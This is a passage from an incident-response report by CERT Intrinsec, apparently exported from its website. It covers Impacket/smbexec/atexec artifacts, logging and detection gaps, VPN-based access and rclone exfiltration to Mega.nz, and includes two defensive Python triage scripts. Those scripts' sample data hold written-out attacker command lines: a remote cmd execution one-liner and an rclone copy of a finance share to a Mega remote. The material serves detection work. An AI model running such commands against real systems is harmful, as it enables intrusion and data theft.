A distinctive forensic indicator of Impacket-based execution is <strong>the creation of services with names containing Unix epoch timestamps<\/strong> \u2014 a pattern rarely seen in legitimate Windows administration and highly indicative of compromise.<\/p>\n\n\n\n<p><strong>PsExec<\/strong> and direct access to administrative shares (ADMIN$, C$, etc.) remained present in some engagements, though less prevalent than in previous years. Attackers increasingly favor tooling that avoids dropping executable files on disk.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-the-detection-gap\">The detection gap<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In the majority of incidents, victim organizations <strong>failed to detect the attacker&#039;s tooling during the intrusion<\/strong>. These tools were identified only during post-incident forensic analysis. This detection failure was not due to the stealthiness of attacker techniques \u2014 the tools described above leave abundant, well-documented forensic artifacts. 
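<\/p>\n\n\n\n<p>The following Python triage is an added example; it is not part of the CERT Intrinsec report and not NetExec or Impacket code. It turns the artifacts described above into rules and runs them over constructed sample events: a 7045 service name embedding a Unix epoch value (the Impacket indicator), a 7045 service whose ImagePath is a cmd.exe or PowerShell one-liner (the smbexec pattern), a 4698 task whose interpreter action writes its output to an administrative share (the atexec pattern), and, for the Kerberoasting indicator named in the credential-harvesting recommendations, a burst of 4769 service-ticket requests from a single account. The flat event shape and field names, the host names, the numeric range treated as an epoch timestamp and the burst threshold are all assumptions to adapt to your own SIEM export.<\/p>

```python
# Added example (not from the CERT Intrinsec report, not NetExec/Impacket code):
# rule-based triage of Windows event records for the artifacts discussed above.
# Field names are the native EventData names; the flat export shape, host names,
# thresholds and the epoch range are assumptions.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, one dict per record as a SIEM export might look.
SAMPLE_EVENTS = [
    # System 7045: service name embedding a Unix epoch value (Impacket indicator)
    {'id': 7045, 'host': 'SRV-FILE01', 'time': '2025-03-04T02:11:09',
     'ServiceName': 'svc1741054269', 'ImagePath': r'C:\Windows\Temp\uqDLn.exe'},
    # System 7045: random name, ImagePath is a cmd.exe one-liner (smbexec pattern)
    {'id': 7045, 'host': 'SRV-FILE01', 'time': '2025-03-04T02:12:40', 'ServiceName': 'BTOBTO',
     'ImagePath': r'%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat'},
    # System 7045: legitimate agent installation, must not fire
    {'id': 7045, 'host': 'WS-0042', 'time': '2025-03-04T09:00:00',
     'ServiceName': 'ContosoEdrAgent', 'ImagePath': r'"C:\Program Files\Contoso EDR\Agent.exe"'},
    # Security 4698: task action is cmd.exe writing its output to ADMIN$ (atexec pattern)
    {'id': 4698, 'host': 'SRV-APP02', 'time': '2025-03-04T02:15:03', 'SubjectUserName': 'backup_svc',
     'TaskName': r'\kJgxQtWm', 'TaskContent': r'<Exec><Command>cmd.exe</Command><Arguments>/C whoami > '
                                              r'\\127.0.0.1\ADMIN$\Temp\kJgxQtWm.tmp 2>&1</Arguments></Exec>'},
    # Security 4769: one ordinary AES service-ticket request, must not fire
    {'id': 4769, 'host': 'DC01', 'time': '2025-03-04T08:30:00', 'TargetUserName': 'alice@CORP.LOCAL',
     'ServiceName': 'sql_svc', 'TicketEncryptionType': '0x12'},
]
# Security 4769 burst: one account requesting RC4 tickets for many SPN-bearing accounts
SAMPLE_EVENTS += [
    {'id': 4769, 'host': 'DC01', 'time': f'2025-03-04T02:20:{i:02d}', 'TargetUserName': 'backup_svc@CORP.LOCAL',
     'ServiceName': svc, 'TicketEncryptionType': '0x17'}
    for i, svc in enumerate(['sql_svc', 'http_svc', 'mssql_rpt', 'exch_svc', 'sap_svc', 'WS-0042$'])
]

# Ten-digit value between 1.5e9 and 2e9 (mid-2017 to 2033), treated as an epoch timestamp (assumption)
EPOCH_IN_NAME = re.compile(r'(?<![0-9])(1[5-9][0-9]{8})(?![0-9])')
# cmd.exe, %COMSPEC% or PowerShell used as the service binary or the task action
INTERPRETER = re.compile(r'(?<![A-Za-z])(cmd|%COMSPEC%|powershell|pwsh)(\.exe)?(?![A-Za-z])', re.I)
# UNC path to ADMIN$ or a drive share such as C$
ADMIN_SHARE = re.compile(r'\\\\[^\\]+\\(ADMIN\$|[A-Za-z]\$)', re.I)


def check_service_install(ev):
    """Rules for System 7045; returns a list of (rule, detail) tuples."""
    name, path = ev.get('ServiceName', ''), ev.get('ImagePath', '')
    hits = []
    m = EPOCH_IN_NAME.search(name)
    if m:
        hits.append(('impacket_epoch_service_name', f'service {name!r} embeds epoch {m.group(1)}'))
    if INTERPRETER.search(path):
        hits.append(('smbexec_interpreter_service', f'service {name!r} runs an interpreter: {path[:60]}'))
    return hits


def check_task_create(ev):
    """Rule for Security 4698: interpreter action whose output lands on an admin share."""
    content, task = ev.get('TaskContent', ''), ev.get('TaskName')
    if INTERPRETER.search(content) and ADMIN_SHARE.search(content):
        return [('atexec_remote_task', f'task {task!r} runs an interpreter and writes to an admin share')]
    return []


def check_kerberoast(events, window=timedelta(minutes=5), threshold=5):
    """Security 4769: one requester obtaining tickets for at least threshold distinct
    SPN-bearing accounts inside window; krbtgt and computer accounts are ignored."""
    by_user = defaultdict(list)
    for ev in events:
        svc = ev.get('ServiceName', '')
        if ev.get('id') != 4769 or svc.lower() == 'krbtgt' or svc.endswith('$'):
            continue
        by_user[ev['TargetUserName']].append(
            (datetime.fromisoformat(ev['time']), svc, ev.get('TicketEncryptionType'), ev['host']))
    hits = []
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _, _, host) in enumerate(reqs):
            in_win = [r for r in reqs[i:] if r[0] - t0 <= window]
            services = {r[1] for r in in_win}
            if len(services) >= threshold:
                rc4 = sum(1 for r in in_win if r[2] == '0x17')
                hits.append((host, 'kerberoast_burst',
                             f'{user} requested tickets for {len(services)} services within {window} ({rc4} RC4)'))
                break  # one finding per requester is enough
    return hits


def triage(events):
    """Apply every rule and return the findings as dicts."""
    findings = []
    for ev in events:
        if ev.get('id') == 7045:
            checks = check_service_install(ev)
        elif ev.get('id') == 4698:
            checks = check_task_create(ev)
        else:
            continue
        findings += [{'host': ev['host'], 'time': ev['time'], 'rule': r, 'detail': d} for r, d in checks]
    findings += [{'host': h, 'time': None, 'rule': r, 'detail': d} for h, r, d in check_kerberoast(events)]
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_EVENTS):
        print(f['host'].ljust(11), f['rule'].ljust(28), f['detail'])
```

<p>Run as a script it prints one finding per rule for the sample; in practice, feed triage() the records of your SIEM export. The service and task rules are per-event and cheap. The Kerberoasting rule needs the 4769 stream from the domain controllers, which is precisely the log that is most often not collected.<\/p>\n\n\n\n<p>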
Rather, detection failed because <strong>the necessary logs were either not collected or not monitored<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Windows Event Logs<\/strong> were configured with default settings, missing critical event categories<\/li>\n\n\n\n<li><strong>No centralized log collection<\/strong> (SIEM) was in place, or retention was insufficient<\/li>\n\n\n\n<li><strong>Security teams lacked detection rules<\/strong> for known offensive tooling<\/li>\n\n\n\n<li><strong>Administrative activity was not baselined<\/strong>, making anomalies invisible<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This observation is consistent across our engagements: <strong>the gap is not just technical capability, but operational maturity in logging and monitoring<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-defensive-implications-0\">Defensive implications<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The following recommendations focus on closing the logging and detection gap:<\/p>\n\n\n\n<p><strong>Logging policy \u2014 foundational requirements:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Service installation (System 7045)<\/strong>. Detects smbexec, PsExec and Impacket psexec\/smbexec. The Service Control Manager writes this event by default, so the gap here is usually collection rather than configuration<\/li>\n\n\n\n<li><strong>Scheduled task creation (4698)<\/strong>. Detects atexec. Requires the Audit Other Object Access Events subcategory, which is not enabled by default<\/li>\n\n\n\n<li><strong>Process creation with command line (4688)<\/strong>. Visibility into executed commands. Requires Audit Process Creation plus the Include command line in process creation events policy; without the latter the command line field is empty<\/li>\n\n\n\n<li><strong>PowerShell script block logging (4104)<\/strong>. Captures the content of every script block PowerShell executes, including payloads that are decoded or deobfuscated in memory<\/li>\n\n\n\n<li><strong>Logon success and failure (4624, 4625)<\/strong>. Authentication, including logon type and source address; lateral movement shows up as type 3 (network) and type 10 (RemoteInteractive) logons<\/li>\n\n\n\n<li><strong>Administrative share access (5140, 5145)<\/strong>. Detects ADMIN$ and C$ access. Requires the Audit File Share and Audit Detailed File Share subcategories; 5145 is high-volume, so filter it to administrative shares at collection time<\/li>\n\n\n\n<li><strong>Kerberos service ticket requests (4769)<\/strong> on domain controllers. Needed for the Kerberoasting indicators discussed above: one account requesting tickets for many SPN-bearing accounts, typically with RC4 encryption (type 0x17)<\/li>\n<\/ul>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Without these events, detection of post-exploitation activity is <strong>effectively blind<\/strong>.<\/p>\n\n\n\n<p><strong>Centralized collection and retention:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Forward logs to a SIEM<\/strong> or centralized logging platform, so that an attacker who clears the local event logs does not also erase the evidence<\/li>\n\n\n\n<li><strong>Ensure retention of at least 90 days<\/strong> \u2014 many intrusions are discovered weeks after initial access<\/li>\n\n\n\n<li><strong>Include domain controllers, servers, and workstations<\/strong> in collection scope<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-detection-content\">Detection content<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Deploy detection rules for known offensive tool signatures:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Service names containing Unix timestamps<\/strong> (Impacket indicator)<\/li>\n\n\n\n<li><strong>Randomly named services<\/strong> whose binary path invokes cmd.exe, %COMSPEC% or PowerShell instead of an executable (smbexec indicator)<\/li>\n\n\n\n<li><strong>Scheduled tasks created via remote RPC<\/strong>: a 4698 whose creating account has a concurrent type 3 network logon (4624) from the same source, and whose action redirects its output to an administrative share<\/li>\n\n\n\n<li><strong>Alert on administrative share access<\/strong> from non-administrative systems<\/li>\n\n\n\n<li><strong>Baseline legitimate administrative tooling<\/strong>; alert on deviations<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-operational-readiness\">Operational readiness<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" 
class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Ensure security teams <strong>can investigate alerts within hours<\/strong>, not days. Conduct <strong>periodic purple team exercises<\/strong> to validate detection coverage: replay NetExec or Impacket execution methods against a test host and confirm that the expected 7045, 4698 and 4688 events actually reach the SIEM and raise an alert.<\/p>\n\n\n\n<p>The tools used by attackers <strong>are well-known and leave predictable traces<\/strong>. The question is not whether detection is possible, but whether organizations have invested in the logging and monitoring infrastructure to make it happen.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-command-and-control-through-vpn-exploitation\">Command and Control through VPN exploitation<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-vpn-as-primary-c2-channel\">VPN as primary C2 channel<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>A notable finding across our engagements: when attackers obtained legitimate VPN credentials, they rarely deployed dedicated Command and Control infrastructure. 
<strong>The compromised VPN session itself served as the primary remote access channel<\/strong> \u2014 providing encrypted, authenticated connectivity that blended seamlessly with legitimate traffic.<br>This observation has significant implications for detection: <strong>traditional C2 hunting<\/strong> focused on beaconing patterns, unusual outbound connections, or known malicious infrastructure <strong>is ineffective when the attacker operates through the organization&#039;s own VPN gateway<\/strong>. Detection effort has to move to the gateway&#039;s own telemetry instead: where each authentication comes from (source ASN, geography, device), whether a user holds several sessions at once or logs on outside their usual hours, and what the session reaches once inside the network.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-remote-monitoring-and-management-tools-as-fallback\">Remote Monitoring and Management tools as fallback<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>When attackers required additional remote access mechanisms, they overwhelmingly favored <strong>legitimate Remote Monitoring and Management (RMM) tools<\/strong> over traditional offensive C2 frameworks. The following tools were observed across engagements:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AnyDesk<\/li>\n\n\n\n<li>Splashtop<\/li>\n\n\n\n<li>ScreenConnect \/ ConnectWise<\/li>\n\n\n\n<li>MeshAgent<\/li>\n\n\n\n<li>Teramind<\/li>\n<\/ul>\n\n\n\n<p>Because these products are signed, widely used by IT teams and rarely flagged by antivirus, the practical control is an allow-list: inventory the RMM products the organization actually uses, and block or alert on the installation and outbound connections of any other.<\/p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-data-exfiltration-methodology\">Data Exfiltration Methodology<\/h3>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Data exfiltration was observed in incidents involving ransomware double extortion, Initial Access Brokers preparing access packages for resale, and suspected espionage operations.<br><strong>RCLONE<\/strong>, a command-line cloud synchronization tool, <strong>was the dominant exfiltration utility<\/strong>.<br><strong>Mega.nz was the most frequently observed destination<\/strong>, with <strong>SFTP to attacker-controlled infrastructure<\/strong> observed in a smaller 
number of cases.<br>In the vast majority of incidents, <strong>exfiltration was not detected during the intrusion<\/strong> \u2014 it was identified only during post-incident forensic analysis. This consistent detection failure highlights <strong>fundamental gaps in outbound traffic monitoring<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-exfiltration-staging-pattern\">Exfiltration staging pattern<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>A consistent operational pattern was observed: rather than executing RCLONE directly on systems hosting the targeted data, <strong>attackers staged the tool on domain controllers or administrator workstations<\/strong> \u2014 systems with <strong>broad network visibility and existing access to network shares<\/strong>.<\/p>\n\n\n\n<p>This approach offers several advantages to the attacker: it <strong>minimizes the number of systems<\/strong> on which exfiltration tooling is deployed and <strong>leverages existing network share access<\/strong> from privileged systems. Additionally, we assess that attackers deliberately select domain controllers and administrator workstations because these systems <strong>frequently benefit from less restrictive network policies<\/strong> \u2014 proxy exclusions, direct internet access, or relaxed firewall rules \u2014 originally configured to accommodate administrative operations. This misconfiguration provides attackers with an <strong>unfiltered egress path that would not be available from standard user endpoints<\/strong>.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"h-defensive-implications-1\">Defensive implications<\/h4>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Restrict outbound internet access from Tier 0 systems<\/strong>. Domain controllers should not have direct internet access under any circumstances. 
Enforcing this through firewall policy would neutralize the most common exfiltration pattern observed. This single control addresses the root cause of the staging pattern described above.<\/li>\n\n\n\n<li><strong>Block or monitor known exfiltration destinations<\/strong>. If not business-justified, block access to Mega.nz and similar cloud storage providers at the proxy or firewall level. Where blocking is not feasible, alert on any connection from server infrastructure to these services.<\/li>\n\n\n\n<li><strong>Detect RCLONE execution<\/strong>. Alert on RCLONE binary presence or execution \u2014 particularly on domain controllers and administrative workstations, where this tool has no legitimate purpose. Monitor for known RCLONE command-line patterns (sync, copy, --transfers, --config). Attackers routinely rename the binary, so key the detection on the command-line shape (a copy or sync verb, a remote:path argument, these flags) and on file hashes rather than on the name rclone.exe alone.<\/li>\n\n\n\n<li><strong>Monitor anomalous outbound volume<\/strong>. Implement netflow analysis or proxy-based monitoring for unusual outbound data volume, especially from privileged systems. Exfiltration of significant datasets produces detectable traffic anomalies \u2014 provided someone is looking.<\/li>\n\n\n\n<li><strong>Monitor network share access patterns<\/strong>. A domain controller or administrative workstation performing bulk read operations across multiple file shares (a single account generating a high volume of 5145 events against many shares in a short period) is consistent with exfiltration staging and should trigger investigation.<\/li>\n\n\n\n<li><strong>Treat exfiltration detection as a priority investment<\/strong>. The consistent failure to detect exfiltration in progress represents a missed opportunity to contain incidents before the most damaging phase \u2014 data exposure. 
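<\/li>\n<\/ul>\n\n\n\n<p>As an added example (not part of the CERT Intrinsec report, and not rclone&#039;s own code), the Python below implements two of the checks above over constructed records: rclone execution in 4688 process-creation events, matched by binary name or, because the binary is routinely renamed, by command-line shape (a copy or sync verb, an rclone flag such as --transfers or --config, and a remote:path argument), and per-host outbound volume from internet-bound flow records, with any non-allowlisted egress from a Tier 0 host treated as a finding regardless of volume. The Tier 0 inventory, the egress allowlist, the flagged storage domains and the volume threshold are assumptions to replace with your own.<\/p>

```python
# Added example (not from the CERT Intrinsec report, not rclone code): two checks
# for the exfiltration pattern described above, run over constructed records.
# (1) Security 4688 with command-line auditing: rclone by binary name, or by
#     command-line shape when the binary has been renamed.
# (2) Internet-bound flow records summarised per source host, with a
#     zero-tolerance policy for Tier 0 hosts.
# Host roles, allowlist, flagged destinations and the threshold are assumptions.
import re
from collections import defaultdict

TIER0_HOSTS = {'DC01', 'DC02', 'ADM-WS01'}                     # assumed Tier 0 / admin assets
TIER0_EGRESS_ALLOW = {'proxy.corp.local', 'wsus.corp.local'}  # assumed permitted egress for them
FLAGGED_STORAGE = ('mega.nz', 'mega.co.nz')                   # Mega.nz per the report; extend as needed
VOLUME_THRESHOLD = 2 * 1024 ** 3                              # 2 GiB outbound per host per window (assumed)

RCLONE_VERB = re.compile(r'(?<![A-Za-z])(copy|copyto|sync|move|ls|lsd|lsjson)(?![A-Za-z])')
RCLONE_FLAG = re.compile(r'--(transfers|config|checkers|progress|multi-thread-streams|'
                         r'ignore-existing|no-check-certificate)(?![A-Za-z-])')
# remote:path argument such as mega:finance or sftp-vault:/archive; C:\ and https:// do not match
RCLONE_REMOTE = re.compile(r'(?<![A-Za-z0-9.])[A-Za-z0-9_-]+:(?!//)(?:/|[A-Za-z])')

# Constructed sample records
SAMPLE_PROCESS_EVENTS = [
    # renamed rclone on a domain controller, pushing a finance share to a Mega remote
    {'id': 4688, 'host': 'DC01', 'SubjectUserName': r'CORP\adm_jsmith',
     'NewProcessName': r'C:\Users\Public\svchost.exe',
     'CommandLine': r'C:\Users\Public\svchost.exe copy \\FS01\Finance mega:finance --transfers 32 --config C:\Users\Public\r.conf'},
    # rclone under its own name on a backup server: worth a look, but not Tier 0
    {'id': 4688, 'host': 'BKP01', 'SubjectUserName': r'CORP\backup_svc',
     'NewProcessName': r'D:\Tools\rclone.exe',
     'CommandLine': r'rclone.exe sync D:\Backups sftp-vault:/archive --transfers 8'},
    # robocopy to a local drive: contains "copy" and a drive letter, must not fire
    {'id': 4688, 'host': 'FS01', 'SubjectUserName': r'CORP\backup_svc',
     'NewProcessName': r'C:\Windows\System32\Robocopy.exe',
     'CommandLine': r'robocopy \\FS01\Finance D:\Backup /MIR /R:1'},
]
# one record per (source host, destination), internet-bound traffic only, as seen at the perimeter
SAMPLE_FLOWS = [
    {'src_host': 'DC01', 'dst': 'wsus.corp.local', 'dst_port': 8530, 'bytes_out': 120_000},
    {'src_host': 'DC01', 'dst': 'mega.nz', 'dst_port': 443, 'bytes_out': 3_300_000_000},
    {'src_host': 'FS01', 'dst': 'mega.co.nz', 'dst_port': 443, 'bytes_out': 52_000_000},
    {'src_host': 'WS-0042', 'dst': 'updates.example.net', 'dst_port': 443, 'bytes_out': 900_000},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def classify_process(ev):
    """Return a finding for an rclone-like process-creation event, or None."""
    cmd = ev.get('CommandLine', '')
    reasons = []
    if basename(ev.get('NewProcessName', '')) == 'rclone.exe':
        reasons.append('binary name')
    if RCLONE_VERB.search(cmd) and RCLONE_FLAG.search(cmd) and RCLONE_REMOTE.search(cmd):
        reasons.append('command-line shape (verb + rclone flag + remote:path)')
    if not reasons:
        return None
    return {'rule': 'rclone_execution', 'host': ev['host'],
            'severity': 'high' if ev['host'] in TIER0_HOSTS else 'medium',
            'detail': '; '.join(reasons) + ' | ' + cmd}


def egress_findings(flows):
    """Sum outbound bytes per (host, destination) and apply the egress policies."""
    per_pair = defaultdict(int)
    for f in flows:
        per_pair[(f['src_host'], f['dst'])] += f['bytes_out']
    per_host = defaultdict(int)
    findings = []
    for (host, dst), b in per_pair.items():
        per_host[host] += b
        if host in TIER0_HOSTS and dst not in TIER0_EGRESS_ALLOW:   # any volume is a finding
            findings.append({'rule': 'tier0_direct_egress', 'host': host, 'severity': 'high',
                             'detail': f'{b} bytes to {dst}, not in the Tier 0 allowlist'})
        elif dst.endswith(FLAGGED_STORAGE):
            findings.append({'rule': 'storage_destination', 'host': host, 'severity': 'medium',
                             'detail': f'{b} bytes to {dst}'})
    for host, b in per_host.items():
        if b >= VOLUME_THRESHOLD and host not in TIER0_HOSTS:        # Tier 0 already covered above
            findings.append({'rule': 'outbound_volume', 'host': host, 'severity': 'medium',
                             'detail': f'{b} bytes outbound in the window'})
    return findings


def triage(process_events, flows):
    """Combine both checks into one list of findings."""
    return [f for f in map(classify_process, process_events) if f] + egress_findings(flows)


if __name__ == '__main__':
    for f in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_FLOWS):
        print(f['severity'].ljust(7), f['host'].ljust(8), f['rule'].ljust(22), f['detail'])
```

<p>Two design points follow from the report&#039;s observations: the renamed binary on DC01 is rated high purely because of where it ran, and the Tier 0 egress rule does not wait for a volume threshold, because a domain controller should not reach the internet at all, so the first byte is already the anomaly.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>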
Organizations that invest in outbound monitoring gain a critical last line of defense.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>CERT Intrinsec&#039;s observations in 2025 show threat actors continually adapting to bypass the defenses organizations put in place, as those organizations gain a better understanding of attacker tradecraft.<\/p>\n\n\n\n<p>This is visible in the increase of cloud-targeted attacks, which often use methods that bypass traditional defenses such as Multi-Factor Authentication.<\/p>\n\n\n\n<p>The start of 2026 continues this trend, with a resurgence of attacks on AWS (Amazon Web Services) environments, ranging from compromised EC2 instances to entire AWS accounts.<\/p>","protected":false},"excerpt":{"rendered":"<p>CERT Intrinsec is a French Incident Response team providing incident response and crisis management services to organizations across multiple sectors. Certified PRIS (Security Incident Response Service Provider) by ANSSI since 2022, the team has been operating since 2013 and has handled hundreds of engagements, gaining firsthand insight into the evolution of threat actor tradecraft.<\/p>\n<p>In 2025, CERT Intrinsec was engaged in approximately sixty significant incidents involving ransomware operators, Initial Access Brokers (IABs), insider threats, and suspected state-sponsored actors conducting intelligence operations. These incidents spanned a wide range of environments, from legacy on-premise infrastructure to cloud-native Microsoft 365 tenants.<\/p>\n<p>This report synthesizes our observations from these engagements with a focus on actionable findings. 
Rather than presenting descriptive statistics alone, we examine intrusion mechanisms, attacker dwell time, targeted assets, and defensive gaps \u2014 with the explicit goal of informing detection strategies and hardening priorities for security practitioners.<\/p>","protected":false},"author":54,"featured_media":231445,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[176],"class_list":["post-231421","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cert","tag-incident-response"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.3) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Rapport sur les incidents cyber et recommandations<\/title>\n<meta name=\"description\" content=\"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CERT Intrinsec Incidents Report 2025\" \/>\n<meta property=\"og:description\" content=\"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/\" \/>\n<meta property=\"og:site_name\" content=\"INTRINSEC\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-24T15:09:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-27T14:43:56+00:00\" \/>\n<meta 
property=\"og:image\" content=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1456\" \/>\n\t<meta property=\"og:image:height\" content=\"816\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Quentin Peyronnet\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Quentin Peyronnet\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\"},\"author\":{\"name\":\"Quentin Peyronnet\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eb68c362eb25b906b7a3ebb412634a28\"},\"headline\":\"CERT Intrinsec Incidents Report 2025\",\"datePublished\":\"2026-02-24T15:09:37+00:00\",\"dateModified\":\"2026-03-27T14:43:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\"},\"wordCount\":3770,\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"keywords\":[\"Incident 
Response\"],\"articleSection\":[\"CERT\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\",\"name\":\"Rapport sur les incidents cyber et recommandations\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"datePublished\":\"2026-02-24T15:09:37+00:00\",\"dateModified\":\"2026-03-27T14:43:56+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eb68c362eb25b906b7a3ebb412634a28\"},\"description\":\"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre 
